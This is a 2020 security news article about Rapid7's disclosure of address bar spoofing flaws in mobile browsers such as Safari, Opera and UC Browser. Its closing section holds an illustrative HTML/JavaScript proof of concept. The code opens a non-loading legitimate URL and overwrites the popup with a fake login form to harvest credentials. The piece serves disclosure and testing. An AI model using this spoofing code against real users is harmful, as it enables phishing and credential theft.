Attackers Target Popular Mobile Browsers with Spoofing Attacks


Saturday, October 24th, 2020

Cybersecurity firm Rapid7 has released a report detailing ten new address bar spoofing vulnerabilities found across seven mobile browser applications. Each vulnerability lets a malicious web page make the browser display a URL it did not actually load, typically the address of a legitimate site the attacker wants to impersonate. Because mobile browsers are built for small screens, they lack many of the security cues and hardening measures built into the desktop versions of the same browsers, and the address bar is often the user's main indicator of which site they are on. That makes address bar spoofing considerably more dangerous on smartphones and other mobile devices than on the desktop.

The browsers named in Rapid7's report are Apple Safari, Opera Touch, Opera Mini, Bolt Browser, RITS Browser, UC Browser and Yandex Browser. Apple and Opera both released patches after the researchers notified them in August. The vendors of the more niche browsers did not respond to the researchers at all, which likely leaves those browsers vulnerable to these attacks.

Exploiting any of these bugs requires an unpatched browser and an attacker who can lure the victim to a malicious page, typically through social engineering such as a phishing link. Users should update their browsers immediately or switch to a browser that is not affected. The ten CVEs associated with these vulnerabilities are:

  • CVE-2020-7363
  • CVE-2020-7364
  • CVE TBD-Opera
  • CVE TBD-Opera
  • CVE TBD-Opera
  • CVE TBD-Opera
  • CVE-2020-7369
  • CVE-2020-7370
  • CVE-2020-7371
  • CVE-2020-9987

Rapid7 explains that the root cause is a race between page loading and address bar updates. A malicious page starts a navigation to a legitimate URL; if the browser refreshes the address bar before that navigation actually commits, the attacker's content can remain on screen underneath the legitimate address, so the browser is effectively showing the wrong URL for the page the user is looking at. A more detailed discussion of the attack can be found in Rapid7's report.
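The shape of this class of bug, as an added generic illustration written for this page (it is not one of Rapid7's proofs of concept and is not taken from the report; the target URL, the unresponsive port 8080 and the form markup are assumptions): an attacker page opens a legitimate URL that will not finish loading and keeps writing its own markup into the still-blank popup. The popup starts as about:blank, which is same-origin with the opener, so the opener can script it until the real navigation commits; a browser that updates the address bar when the navigation starts, rather than when it commits, shows the legitimate URL above the attacker's content for as long as the load is pending.

```html
<!DOCTYPE html>
<!--
  Generic illustration of the address bar spoofing class discussed above.
  Constructed for this page; not one of Rapid7's proofs of concept and not a
  claim about any particular browser or version.
-->
<html>
<head>
  <meta charset="utf-8">
  <title>attacker page (illustration)</title>
</head>
<body>
  <button onclick="spoof()">Continue to your bank</button>

  <script>
    // Assumption (hypothetical): example.com does not answer on port 8080, so
    // the navigation starts but never commits. Any legitimate-looking URL that
    // will not finish loading serves the same purpose.
    const TARGET = "https://example.com:8080/login";

    function spoof() {
      // The popup begins life as about:blank, same-origin with this page, so the
      // opener may script it until the real document commits.
      const w = window.open(TARGET, "_blank");
      if (!w) return;               // popup blocked; nothing to do

      const timer = setInterval(() => {
        try {
          // Overwrite the still-blank document with attacker-controlled content.
          // body.innerHTML is used rather than document.write() so the pending
          // navigation is left alone.
          w.document.body.innerHTML =
            "<h1>Sign in</h1>" +
            "<form><input name=user placeholder=Username>" +
            "<input name=pass type=password placeholder=Password>" +
            "<button>Log in</button></form>";
        } catch (e) {
          // A SecurityError here means the navigation to TARGET committed and the
          // window is now cross-origin. The bug is present only if the address
          // bar showed TARGET *before* this point, while the form above was visible.
          clearInterval(timer);
        }
      }, 100);
    }
  </script>
</body>
</html>
```

On a correctly behaving browser the address bar shows the opener's origin, about:blank or a loading state until the target document commits, after which the opener loses access and the spoofed form disappears. The only observable that matters when testing a browser build is whether the URL in the address bar ever disagrees with the document the user is actually looking at.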
